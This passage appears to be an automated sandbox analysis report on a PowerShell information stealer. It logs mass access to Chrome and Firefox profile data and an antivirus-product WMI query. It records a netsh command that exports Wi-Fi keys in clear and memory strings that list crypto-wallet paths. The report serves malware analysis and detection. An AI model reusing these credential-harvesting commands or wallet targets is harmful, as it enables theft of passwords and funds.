            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\TempState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AC VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\RoamingState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\TempState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\RoamingState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Symbols VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
            Source: C:\Windows\System32\cscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: 0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "Electrum" = Join-Path $env:appdata "\Electrum\wallets"
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "com.liberty.jaxx" = Join-Path $env:appdata "\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb"
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "Exodus" = Join-Path $env:appdata "\Exodus\exodus.wallet"
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: "Ethereum" = Join-Path $env:appdata "\Ethereum\keystore"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
